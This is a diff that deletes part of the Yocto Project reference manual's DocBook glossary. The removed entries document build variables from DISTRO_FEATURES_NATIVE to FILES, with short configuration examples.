-                    filtered using the
-                    <link linkend='var-DISTRO_FEATURES_FILTER_NATIVE'><filename>DISTRO_FEATURES_FILTER_NATIVE</filename></link>
-                    variable.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-DISTRO_FEATURES_NATIVESDK'><glossterm>DISTRO_FEATURES_NATIVESDK</glossterm>
-            <info>
-                DISTRO_FEATURES_NATIVESDK[doc] = "Specifies a list of features that should be included in DISTRO_FEATURES when building nativesdk recipes."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies a list of features that should be included in
-                    <link linkend='var-DISTRO_FEATURES'><filename>DISTRO_FEATURES</filename></link>
-                    when building nativesdk recipes.
-                    This variable is used in addition to the features
-                    filtered using the
-                    <link linkend='var-DISTRO_FEATURES_FILTER_NATIVESDK'><filename>DISTRO_FEATURES_FILTER_NATIVESDK</filename></link>
-                    variable.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-DISTRO_NAME'><glossterm>DISTRO_NAME</glossterm>
-            <info>
-                DISTRO_NAME[doc] = "The long name of the distribution."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The long name of the distribution.
-                    For information on the short name of the distribution, see
-                    the
-                    <link linkend='var-DISTRO'><filename>DISTRO</filename></link>
-                    variable.
-                </para>
-
-                <para>
-                    The <filename>DISTRO_NAME</filename> variable corresponds
-                    to a distribution configuration file whose root name is the
-                    same as the variable's argument and whose filename
-                    extension is <filename>.conf</filename>.
-                    For example, the distribution configuration file for the
-                    Poky distribution is named <filename>poky.conf</filename>
-                    and resides in the
-                    <filename>meta-poky/conf/distro</filename> directory of
-                    the
-                    <link linkend='source-directory'>Source Directory</link>.
-                </para>
-
-                <para>
-                    Within that <filename>poky.conf</filename> file, the
-                    <filename>DISTRO_NAME</filename> variable is set as
-                    follows:
-                    <literallayout class='monospaced'>
-     DISTRO_NAME = "Poky (Yocto Project Reference Distro)"
-                    </literallayout>
-                </para>
-
-                <para>
-                    Distribution configuration files are located in a
-                    <filename>conf/distro</filename> directory within the
-                    <link linkend='metadata'>Metadata</link>
-                    that contains the distribution configuration.
-                    <note>
-                        If the <filename>DISTRO_NAME</filename> variable is
-                        blank, a set of default configurations are used, which
-                        are specified within
-                        <filename>meta/conf/distro/defaultsetup.conf</filename>
-                        also in the Source Directory.
-                    </note>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-DISTRO_VERSION'><glossterm>DISTRO_VERSION</glossterm>
-            <info>
-                DISTRO_VERSION[doc] = "The version of the distribution."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The version of the distribution.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-DISTROOVERRIDES'><glossterm>DISTROOVERRIDES</glossterm>
-            <info>
-                DISTROOVERRIDES[doc] = "A colon-separated list of overrides specific to the current distribution."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    A colon-separated list of overrides specific to the
-                    current distribution.
-                    By default, this list includes the value of
-                    <link linkend='var-DISTRO'><filename>DISTRO</filename></link>.
-                </para>
-
-                <para>
-                    You can extend <filename>DISTROOVERRIDES</filename>
-                    to add extra overrides that should apply to
-                    the distribution.
-                </para>
-
-                <para>
-                    The underlying mechanism behind
-                    <filename>DISTROOVERRIDES</filename> is simply that it
-                    is included in the default value of
-                    <link linkend='var-OVERRIDES'><filename>OVERRIDES</filename></link>.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-DL_DIR'><glossterm>DL_DIR</glossterm>
-            <info>
-                DL_DIR[doc] = "The central download directory used by the build process to store downloads. By default, the directory is 'downloads' in the Build Directory."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The central download directory used by the build process to
-                    store downloads.
-                    By default, <filename>DL_DIR</filename> gets files
-                    suitable for mirroring for everything except Git
-                    repositories.
-                    If you want tarballs of Git repositories, use the
-                    <link linkend='var-BB_GENERATE_MIRROR_TARBALLS'><filename>BB_GENERATE_MIRROR_TARBALLS</filename></link>
-                    variable.
-                </para>
-
-                <para>
-                    You can set this directory by defining the
-                    <filename>DL_DIR</filename> variable in the
-                    <filename>conf/local.conf</filename> file.
-                    This directory is self-maintaining and you should not have
-                    to touch it.
-                    By default, the directory is <filename>downloads</filename>
-                    in the
-                    <link linkend='build-directory'>Build Directory</link>.
-                    <literallayout class='monospaced'>
-     #DL_DIR ?= "${TOPDIR}/downloads"
-                    </literallayout>
-                    To specify a different download directory, simply remove
-                    the comment from the line and provide your directory.
-                </para>
-
-                <para>
-                    During a first build, the system downloads many different
-                    source code tarballs from various upstream projects.
-                    Downloading can take a while, particularly if your network
-                    connection is slow.
-                    Tarballs are all stored in the directory defined by
-                    <filename>DL_DIR</filename> and the build system looks there
-                    first to find source tarballs.
-                    <note>
-                        When wiping and rebuilding, you can preserve this
-                        directory to speed up this part of subsequent
-                        builds.
-                    </note>
-                </para>
-
-                <para>
-                    You can safely share this directory between multiple builds
-                    on the same development machine.
-                    For additional information on how the build process gets
-                    source files when working behind a firewall or proxy server,
-                    see this specific question in the
-                    "<link linkend='how-does-the-yocto-project-obtain-source-code-and-will-it-work-behind-my-firewall-or-proxy-server'>FAQ</link>"
-                    chapter.
-                    You can also refer to the
-                    "<ulink url='&YOCTO_WIKI_URL;/wiki/Working_Behind_a_Network_Proxy'>Working Behind a Network Proxy</ulink>"
-                    Wiki page.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-DOC_COMPRESS'><glossterm>DOC_COMPRESS</glossterm>
-            <info>
-                DOC_COMPRESS[doc] = "When inheriting the compress_doc class, this variable sets the compression policy used when the OpenEmbedded build system compresses man pages and info pages."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    When inheriting the
-                    <link linkend='ref-classes-compress_doc'><filename>compress_doc</filename></link>
-                    class, this variable sets the compression policy used when
-                    the OpenEmbedded build system compresses man pages and info
-                    pages.
-                    By default, the compression method used is gz (gzip).
-                    Other policies available are xz and bz2.
-                </para>
-
-                <para>
-                    For information on policies and on how to use this
-                    variable, see the comments in the
-                    <filename>meta/classes/compress_doc.bbclass</filename> file.
-                </para>
-            </glossdef>
-        </glossentry>
-
-    </glossdiv>
-
-    <glossdiv id='var-glossary-e'><title>E</title>
-
-        <glossentry id='var-EFI_PROVIDER'><glossterm>EFI_PROVIDER</glossterm>
-            <info>
-                EFI_PROVIDER[doc] = "When building bootable images (i.e. where hddimg, iso, or wic.vmdk is in IMAGE_FSTYPES), the EFI_PROVIDER variable specifies the EFI bootloader to use."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    When building bootable images (i.e. where
-                    <filename>hddimg</filename>, <filename>iso</filename>,
-                    or <filename>wic.vmdk</filename> is in
-                    <link linkend='var-IMAGE_FSTYPES'><filename>IMAGE_FSTYPES</filename></link>),
-                    the <filename>EFI_PROVIDER</filename> variable specifies
-                    the EFI bootloader to use.
-                    The default is "grub-efi", but "systemd-boot" can be used
-                    instead.
-                </para>
-
-                <para>
-                    See the
-                    <link linkend='ref-classes-systemd-boot'><filename>systemd-boot</filename></link>
-                    and
-                    <link linkend='ref-classes-image-live'><filename>image-live</filename></link>
-                    classes for more information.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-ENABLE_BINARY_LOCALE_GENERATION'><glossterm>ENABLE_BINARY_LOCALE_GENERATION</glossterm>
-            <info>
-                ENABLE_BINARY_LOCALE_GENERATION[doc] = "Controls which locales for glibc are generated during the build. The variable is useful if the target device has 64Mbytes of RAM or less."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Variable that controls which locales for
-                    <filename>glibc</filename> are generated during the
-                    build (useful if the target device has 64Mbytes
-                    of RAM or less).
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-ERR_REPORT_DIR'><glossterm>ERR_REPORT_DIR</glossterm>
-            <info>
-                ERR_REPORT_DIR[doc] = "When used with the report-error class, specifies the path used for storing the debug files created by the error reporting tool, which allows you to submit build errors you encounter to a central database."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    When used with the
-                    <link linkend='ref-classes-report-error'><filename>report-error</filename></link>
-                    class, specifies the path used for storing the debug files
-                    created by the
-                    <ulink url='&YOCTO_DOCS_DEV_URL;#using-the-error-reporting-tool'>error reporting tool</ulink>,
-                    which allows you to submit build errors you encounter to a
-                    central database.
-                    By default, the value of this variable is
-                    <filename>${</filename><link linkend='var-LOG_DIR'><filename>LOG_DIR</filename></link><filename>}/error-report</filename>.
-                </para>
-
-                <para>
-                    You can set <filename>ERR_REPORT_DIR</filename> to the path
-                    you want the error reporting tool to store the debug files
-                    as follows in your <filename>local.conf</filename> file:
-                    <literallayout class='monospaced'>
-     ERR_REPORT_DIR = "<replaceable>path</replaceable>"
-                    </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-ERROR_QA'><glossterm>ERROR_QA</glossterm>
-            <info>
-                ERROR_QA[doc] = "Specifies the quality assurance checks whose failures are reported as errors by the OpenEmbedded build system."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the quality assurance checks whose failures are
-                    reported as errors by the OpenEmbedded build system.
-                    You set this variable in your distribution configuration
-                    file.
-                    For a list of the checks you can control with this variable,
-                    see the
-                    "<link linkend='ref-classes-insane'><filename>insane.bbclass</filename></link>"
-                    section.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-EXCLUDE_FROM_SHLIBS'><glossterm>EXCLUDE_FROM_SHLIBS</glossterm>
-            <info>
-                EXCLUDE_FROM_SHLIBS[doc] = "Causes the OpenEmbedded build system's shared libraries resolver to exclude an entire package when scanning for shared libraries."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Triggers the OpenEmbedded build system's shared libraries
-                    resolver to exclude an entire package when scanning for
-                    shared libraries.
-                    <note>
-                        The shared libraries resolver's functionality results
-                        in part from the internal function
-                        <filename>package_do_shlibs</filename>, which is part of
-                        the
-                        <link linkend='ref-tasks-package'><filename>do_package</filename></link>
-                        task.
-                        You should be aware that the shared libraries resolver
-                        might implicitly define some dependencies between
-                        packages.
-                    </note>
-                    The <filename>EXCLUDE_FROM_SHLIBS</filename> variable is
-                    similar to the
-                    <link linkend='var-PRIVATE_LIBS'><filename>PRIVATE_LIBS</filename></link>
-                    variable, which excludes a package's particular libraries
-                    only and not the whole package.
-                </para>
-
-                <para>
-                    Use the
-                    <filename>EXCLUDE_FROM_SHLIBS</filename> variable by
-                    setting it to "1" for a particular package:
-                    <literallayout class='monospaced'>
-     EXCLUDE_FROM_SHLIBS = "1"
-                    </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-EXCLUDE_FROM_WORLD'><glossterm>EXCLUDE_FROM_WORLD</glossterm>
-            <info>
-                EXCLUDE_FROM_WORLD[doc] = "Directs BitBake to exclude a recipe from world builds (i.e. bitbake world)."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Directs BitBake to exclude a recipe from world builds (i.e.
-                    <filename>bitbake world</filename>).
-                    During world builds, BitBake locates, parses and builds all
-                    recipes found in every layer exposed in the
-                    <filename>bblayers.conf</filename> configuration file.
-                </para>
-
-                <para>
-                    To exclude a recipe from a world build using this variable,
-                    set the variable to "1" in the recipe.
-                </para>
-
-                <note>
-                    Recipes added to <filename>EXCLUDE_FROM_WORLD</filename>
-                    may still be built during a world build in order to satisfy
-                    dependencies of other recipes.
-                    Adding a recipe to <filename>EXCLUDE_FROM_WORLD</filename>
-                    only ensures that the recipe is not explicitly added
-                    to the list of build targets in a world build.
-                </note>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-EXTENDPE'><glossterm>EXTENDPE</glossterm>
-            <info>
-                EXTENDPE[doc] = "Used with file and pathnames to create a prefix for a recipe's version based on the recipe's PE value. If PE is set and greater than zero for a recipe, EXTENDPE becomes that value."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Used with file and pathnames to create a prefix for a recipe's
-                    version based on the recipe's
-                    <link linkend='var-PE'><filename>PE</filename></link> value.
-                    If <filename>PE</filename> is set and greater than zero for a recipe,
-                    <filename>EXTENDPE</filename> becomes that value (e.g if
-                    <filename>PE</filename> is equal to "1" then <filename>EXTENDPE</filename>
-                    becomes "1_").
-                    If a recipe's <filename>PE</filename> is not set (the default) or is equal to
-                    zero, <filename>EXTENDPE</filename> becomes "".</para>
-                    <para>See the <link linkend='var-STAMP'><filename>STAMP</filename></link>
-                    variable for an example.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-EXTENDPKGV'><glossterm>EXTENDPKGV</glossterm>
-            <info>
-                EXTENDPKGV[doc] = "The full package version specification as it appears on the final packages produced by a recipe."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The full package version specification as it appears on the
-                    final packages produced by a recipe.
-                    The variable's value is normally used to fix a runtime
-                    dependency to the exact same version of another package
-                    in the same recipe:
-                    <literallayout class='monospaced'>
-     RDEPENDS_${PN}-additional-module = "${PN} (= ${EXTENDPKGV})"
-                    </literallayout>
-                </para>
-
-                <para>
-                    The dependency relationships are intended to force the
-                    package manager to upgrade these types of packages in
-                    lock-step.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-EXTERNAL_KERNEL_TOOLS'><glossterm>EXTERNAL_KERNEL_TOOLS</glossterm>
-            <info>
-                EXTERNAL_KERNEL_TOOLS[doc] = "Indicates kernel tools are external to the source tree."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    When set, the <filename>EXTERNAL_KERNEL_TOOLS</filename>
-                    variable indicates that these tools are not in the
-                    source tree.
-                </para>
-
-                <para>
-                    When kernel tools are available in the tree, they are
-                    preferred over any externally installed tools.
-                    Setting the <filename>EXTERNAL_KERNEL_TOOLS</filename>
-                    variable tells the OpenEmbedded build system to prefer
-                    the installed external tools.
-                    See the
-                    <link linkend='ref-classes-kernel-yocto'><filename>kernel-yocto</filename></link>
-                    class in <filename>meta/classes</filename> to see how
-                    the variable is used.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-EXTERNALSRC'><glossterm>EXTERNALSRC</glossterm>
-            <info>
-                EXTERNALSRC[doc] = "If externalsrc.bbclass is inherited, this variable points to the source tree, which is outside of the OpenEmbedded build system."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    When inheriting the
-                    <link linkend='ref-classes-externalsrc'><filename>externalsrc</filename></link>
-                    class, this variable points to the source tree, which is
-                    outside of the OpenEmbedded build system.
-                    When set, this variable sets the
-                    <link linkend='var-S'><filename>S</filename></link>
-                    variable, which is what the OpenEmbedded build system uses
-                    to locate unpacked recipe source code.
-                </para>
-
-                <para>
-                    For more information on
-                    <filename>externalsrc.bbclass</filename>, see the
-                    "<link linkend='ref-classes-externalsrc'><filename>externalsrc.bbclass</filename></link>"
-                    section.
-                    You can also find information on how to use this variable
-                    in the
-                    "<ulink url='&YOCTO_DOCS_DEV_URL;#building-software-from-an-external-source'>Building Software from an External Source</ulink>"
-                    section in the Yocto Project Development Tasks Manual.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-EXTERNALSRC_BUILD'><glossterm>EXTERNALSRC_BUILD</glossterm>
-            <info>
-                EXTERNALSRC_BUILD[doc] = "If externalsrc.bbclass is inherited, this variable points to the directory in which the recipe's source code is built, which is outside of the OpenEmbedded build system."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    When inheriting the
-                    <link linkend='ref-classes-externalsrc'><filename>externalsrc</filename></link>
-                    class, this variable points to the directory in which the
-                    recipe's source code is built, which is outside of the
-                    OpenEmbedded build system.
-                    When set, this variable sets the
-                    <link linkend='var-B'><filename>B</filename></link>
-                    variable, which is what the OpenEmbedded build system uses
-                    to locate the Build Directory.
-                </para>
-
-                <para>
-                    For more information on
-                    <filename>externalsrc.bbclass</filename>, see the
-                    "<link linkend='ref-classes-externalsrc'><filename>externalsrc.bbclass</filename></link>"
-                    section.
-                    You can also find information on how to use this variable
-                    in the
-                    "<ulink url='&YOCTO_DOCS_DEV_URL;#building-software-from-an-external-source'>Building Software from an External Source</ulink>"
-                    section in the Yocto Project Development Tasks Manual.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-EXTRA_AUTORECONF'><glossterm>EXTRA_AUTORECONF</glossterm>
-            <info>
-                EXTRA_AUTORECONF[doc] = "Extra options passed to the autoreconf command, which is executed during do_configure."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    For recipes inheriting the
-                    <link linkend='ref-classes-autotools'><filename>autotools</filename></link>
-                    class, you can use <filename>EXTRA_AUTORECONF</filename> to
-                    specify extra options to pass to the
-                    <filename>autoreconf</filename> command that is
-                    executed during the
-                    <link linkend='ref-tasks-configure'><filename>do_configure</filename></link>
-                    task.
-                </para>
-
-                <para>
-                    The default value is "--exclude=autopoint".
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-EXTRA_IMAGE_FEATURES'><glossterm>EXTRA_IMAGE_FEATURES</glossterm>
-            <info>
-                EXTRA_IMAGE_FEATURES[doc] = "The list of additional features to include in an image. Configure this variable in the conf/local.conf file in the Build Directory."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    A list of additional features to include in an image.
-                    When listing more than one feature, separate them with
-                    a space.
-                </para>
-
-                <para>
-                    Typically, you configure this variable in your
-                    <filename>local.conf</filename> file, which is found in the
-                    <link linkend='build-directory'>Build Directory</link>.
-                    Although you can use this variable from within a recipe,
-                    best practices dictate that you do not.
-                    <note>
-                        To enable primary features from within the image
-                        recipe, use the
-                        <link linkend='var-IMAGE_FEATURES'><filename>IMAGE_FEATURES</filename></link>
-                        variable.
-                    </note>
-                </para>
-
-                <para>
-                    Here are some examples of features you can add:
-                    <literallayout class='monospaced'>
-"dbg-pkgs" - Adds -dbg packages for all installed packages
-             including symbol information for debugging and
-             profiling.
-
-"debug-tweaks" - Makes an image suitable for debugging.
-                 For example, allows root logins without
-                 passwords and enables post-installation
-                 logging. See the 'allow-empty-password'
-                 and 'post-install-logging' features in
-                 the "<link linkend='ref-features-image'>Image Features</link>" section for
-                 more information.
-
-"dev-pkgs" - Adds -dev packages for all installed packages.
-             This is useful if you want to develop against
-             the libraries in the image.
-
-"read-only-rootfs" - Creates an image whose root
-                     filesystem is read-only. See the
-                     "<ulink url='&YOCTO_DOCS_DEV_URL;#creating-a-read-only-root-filesystem'>Creating a Read-Only Root Filesystem</ulink>"
-                     section in the Yocto Project
-                     Development Tasks Manual for
-                     more information
-
-"tools-debug" - Adds debugging tools such as gdb and
-                strace.
-
-"tools-sdk" - Adds development tools such as gcc, make,
-              pkgconfig and so forth.
-
-"tools-testapps" - Adds useful testing tools such as
-                   ts_print, aplay, arecord and so
-                   forth.
-
-                    </literallayout>
-                </para>
-
-                <para>
-                    For a complete list of image features that ships with the
-                    Yocto Project, see the
-                    "<link linkend="ref-features-image">Image Features</link>"
-                    section.
-                </para>
-
-                <para>
-                    For an example that shows how to customize your image by
-                    using this variable, see the
-                    "<ulink url='&YOCTO_DOCS_DEV_URL;#usingpoky-extend-customimage-imagefeatures'>Customizing Images Using Custom <filename>IMAGE_FEATURES</filename> and <filename>EXTRA_IMAGE_FEATURES</filename></ulink>"
-                    section in the Yocto Project Development Tasks Manual.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-EXTRA_IMAGECMD'><glossterm>EXTRA_IMAGECMD</glossterm>
-            <info>
-                EXTRA_IMAGECMD[doc] = "Specifies additional options for the image creation command that has been specified in IMAGE_CMD. When setting this variable, you should use an override for the associated image type."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies additional options for the image
-                    creation command that has been specified in
-                    <link linkend='var-IMAGE_CMD'><filename>IMAGE_CMD</filename></link>.
-                    When setting this variable, use an override for the
-                    associated image type.
-                    Here is an example:
-                    <literallayout class='monospaced'>
-     EXTRA_IMAGECMD_ext3 ?= "-i 4096"
-                    </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-EXTRA_IMAGEDEPENDS'><glossterm>EXTRA_IMAGEDEPENDS</glossterm>
-            <info>
-                EXTRA_IMAGEDEPENDS[doc] = "A list of recipes to build that do not provide packages for installing into the root filesystem. Use this variable to list recipes that are required to build the final image, but not needed in the root filesystem."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    A list of recipes to build that do not provide packages
-                    for installing into the root filesystem.
-                </para>
-
-                <para>
-                    Sometimes a recipe is required to build the final image but is not
-                    needed in the root filesystem.
-                    You can use the <filename>EXTRA_IMAGEDEPENDS</filename> variable to
-                    list these recipes and thus specify the dependencies.
-                    A typical example is a required bootloader in a machine configuration.
-                </para>
-
-                <note>
-                    To add packages to the root filesystem, see the various
-                    <filename>*<link linkend='var-RDEPENDS'>RDEPENDS</link></filename>
-                    and <filename>*<link linkend='var-RRECOMMENDS'>RRECOMMENDS</link></filename>
-                    variables.
-                </note>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-EXTRANATIVEPATH'><glossterm>EXTRANATIVEPATH</glossterm>
-            <info>
-                EXTRANATIVEPATH[doc] = "A list of subdirectories of ${STAGING_BINDIR_NATIVE} added to the beginning of the environment variable PATH."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    A list of subdirectories of
-                    <filename>${</filename><link linkend='var-STAGING_BINDIR_NATIVE'><filename>STAGING_BINDIR_NATIVE</filename></link><filename>}</filename>
-                    added to the beginning of the environment variable
-                    <filename>PATH</filename>.
-                    As an example, the following prepends
-                    "${STAGING_BINDIR_NATIVE}/foo:${STAGING_BINDIR_NATIVE}/bar:"
-                    to <filename>PATH</filename>:
-                    <literallayout class='monospaced'>
-     EXTRANATIVEPATH = "foo bar"
-                    </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-EXTRA_OECMAKE'><glossterm>EXTRA_OECMAKE</glossterm>
-            <info>
-                EXTRA_OECMAKE[doc] = "Additional cmake options."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Additional
-                    <ulink url='https://cmake.org/overview/'>CMake</ulink>
-                    options.
-                    See the
-                    <link linkend='ref-classes-cmake'><filename>cmake</filename></link>
-                    class for additional information.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-EXTRA_OECONF'><glossterm>EXTRA_OECONF</glossterm>
-            <info>
-                EXTRA_OECONF[doc] = "Additional configure script options."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Additional <filename>configure</filename> script options.
-                    See
-                    <link linkend='var-PACKAGECONFIG_CONFARGS'><filename>PACKAGECONFIG_CONFARGS</filename></link>
-                    for additional information on passing configure script
-                    options.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-EXTRA_OEMAKE'><glossterm>EXTRA_OEMAKE</glossterm>
-            <info>
-                EXTRA_OEMAKE[doc] = "Additional GNU make options."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Additional GNU <filename>make</filename> options.
-                </para>
-
-                <para>
-                    Because the <filename>EXTRA_OEMAKE</filename> defaults to
-                    "", you need to set the variable to specify any required
-                    GNU options.
-                </para>
-
-                <para>
-                    <link linkend='var-PARALLEL_MAKE'><filename>PARALLEL_MAKE</filename></link>
-                    and
-                    <link linkend='var-PARALLEL_MAKEINST'><filename>PARALLEL_MAKEINST</filename></link>
-                    also make use of
-                    <filename>EXTRA_OEMAKE</filename> to pass the required
-                    flags.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-EXTRA_OESCONS'><glossterm>EXTRA_OESCONS</glossterm>
-            <info>
-                EXTRA_OESCONS[doc] = "When a recipe inherits the scons class, this variable specifies additional configuration options you want to pass to the scons command line."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    When inheriting the
-                    <link linkend='ref-classes-scons'><filename>scons</filename></link>
-                    class, this variable specifies additional configuration
-                    options you want to pass to the
-                    <filename>scons</filename> command line.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-EXTRA_USERS_PARAMS'><glossterm>EXTRA_USERS_PARAMS</glossterm>
-            <info>
-                EXTRA_USERS_PARAMS[doc] = "When a recipe inherits the extrausers class, this variable provides image level user and group operations."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    When inheriting the
-                    <link linkend='ref-classes-extrausers'><filename>extrausers</filename></link>
-                    class, this variable provides image level user and group
-                    operations.
-                    This is a more global method of providing user and group
-                    configuration as compared to using the
-                    <link linkend='ref-classes-useradd'><filename>useradd</filename></link>
-                    class, which ties user and group configurations to a
-                    specific recipe.
-                </para>
-
-                <para>
-                    The set list of commands you can configure using the
-                    <filename>EXTRA_USERS_PARAMS</filename> is shown in the
-                    <filename>extrausers</filename> class.
-                    These commands map to the normal Unix commands of the same
-                    names:
-                    <literallayout class='monospaced'>
-     # EXTRA_USERS_PARAMS = "\
-     # useradd -p '' tester; \
-     # groupadd developers; \
-     # userdel nobody; \
-     # groupdel -g video; \
-     # groupmod -g 1020 developers; \
-     # usermod -s /bin/sh tester; \
-     # "
-                    </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-    </glossdiv>
-
-    <glossdiv id='var-glossary-f'><title>F</title>
-
-        <glossentry id='var-FEATURE_PACKAGES'><glossterm>FEATURE_PACKAGES</glossterm>
-            <info>
-                FEATURE_PACKAGES[doc] = "Defines one or more packages to include in an image when a specific item is included in IMAGE_FEATURES. When setting the value, FEATURE_PACKAGES should have the name of the feature item as an override."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Defines one or more packages to include in an image when
-                    a specific item is included in
-                    <link linkend='var-IMAGE_FEATURES'><filename>IMAGE_FEATURES</filename></link>.
-                    When setting the value, <filename>FEATURE_PACKAGES</filename>
-                    should have the name of the feature item as an override.
-                    Here is an example:
-                    <literallayout class='monospaced'>
-     FEATURE_PACKAGES_widget = "<replaceable>package1</replaceable> <replaceable>package2</replaceable>"
-                    </literallayout>
-                </para>
-
-                <para>
-                    In this example, if "widget" were added to
-                    <filename>IMAGE_FEATURES</filename>, <replaceable>package1</replaceable> and
-                    <replaceable>package2</replaceable> would be included in the image.
-                    <note>
-                        Packages installed by features defined through
-                        <filename>FEATURE_PACKAGES</filename> are often package
-                        groups.
-                        While similarly named, you should not confuse the
-                        <filename>FEATURE_PACKAGES</filename> variable with
-                        package groups, which are discussed elsewhere in the
-                        documentation.
-                    </note>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-FEED_DEPLOYDIR_BASE_URI'><glossterm>FEED_DEPLOYDIR_BASE_URI</glossterm>
-            <info>
-                FEED_DEPLOYDIR_BASE_URI[doc] = "Allow to serve ipk deploy directory as an ad hoc feed (bogofeed). Set to base URL of the directory as exported by HTTP. Set of ad hoc feed configs will be generated in the image."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Points to the base URL of the server and location within
-                    the document-root that provides the metadata and
-                    packages required by OPKG to support runtime package
-                    management of IPK packages.
-                    You set this variable in your
-                    <filename>local.conf</filename> file.
-                </para>
-
-                <para>
-                    Consider the following example:
-                    <literallayout class='monospaced'>
-     FEED_DEPLOYDIR_BASE_URI = "http://192.168.7.1/BOARD-dir"
-                    </literallayout>
-                    This example assumes you are serving your packages over
-                    HTTP and your databases are located in a directory
-                    named <filename>BOARD-dir</filename>, which is underneath
-                    your HTTP server's document-root.
-                    In this case, the OpenEmbedded build system generates a set
-                    of configuration files for you in your target that work
-                    with the feed.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-FILES'><glossterm>FILES</glossterm>
-            <info>
-                FILES[doc] = "The list of directories or files that are placed in a package."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The list of files and directories that are placed in a
-                    package.
-                    The
-                    <link linkend='var-PACKAGES'><filename>PACKAGES</filename></link>
-                    variable lists the packages generated by a recipe.
-                </para>
-
-                <para>
-                    To use the <filename>FILES</filename> variable, provide a
-                    package name override that identifies the resulting package.
-                    Then, provide a space-separated list of files or paths
-                    that identify the files you want included as part of the
-                    resulting package.
-                    Here is an example:
-                    <literallayout class='monospaced'>
-     FILES_${PN} += "${bindir}/mydir1 ${bindir}/mydir2/myfile"
-                    </literallayout>
-                    <note><title>Notes</title>
-                        <itemizedlist>
-                            <listitem><para>
-                                When specifying files or paths, you can pattern
-                                match using Python's
-                                <ulink url='https://docs.python.org/2/library/glob.html'><filename>glob</filename></ulink>
-                                syntax.
-                                For details on the syntax, see the
-                                documentation by following the previous link.
-                                </para></listitem>
-                            <listitem><para>
-                                When specifying paths as part of the
-                                <filename>FILES</filename> variable, it is
-                                good practice to use appropriate path
-                                variables.
-                                For example, use <filename>${sysconfdir}</filename>
-                                rather than <filename>/etc</filename>, or
-                                <filename>${bindir}</filename> rather than
-                                <filename>/usr/bin</filename>.
-                                You can find a list of these variables at the
-                                top of the
-                                <filename>meta/conf/bitbake.conf</filename>
-                                file in the
-                                <link linkend='source-directory'>Source Directory</link>.
-                                You will also find the default values of the
-                                various <filename>FILES_*</filename> variables
-                                in this file.
-                                </para></listitem>
-                        </itemizedlist>
-                    </note>
-                </para>
-
-                <para>
-                    If some of the files you provide with the
-                    <filename>FILES</filename> variable are editable and you
-                    know they should not be overwritten during the package
-                    update process by the Package Management System (PMS), you
-                    can identify these files so that the PMS will not
-                    overwrite them.
-                    See the
-                    <link linkend='var-CONFFILES'><filename>CONFFILES</filename></link>
-                    variable for information on how to identify these files to
-                    the PMS.
-                </para>
-            </glossdef>
-        </glossentry>
-
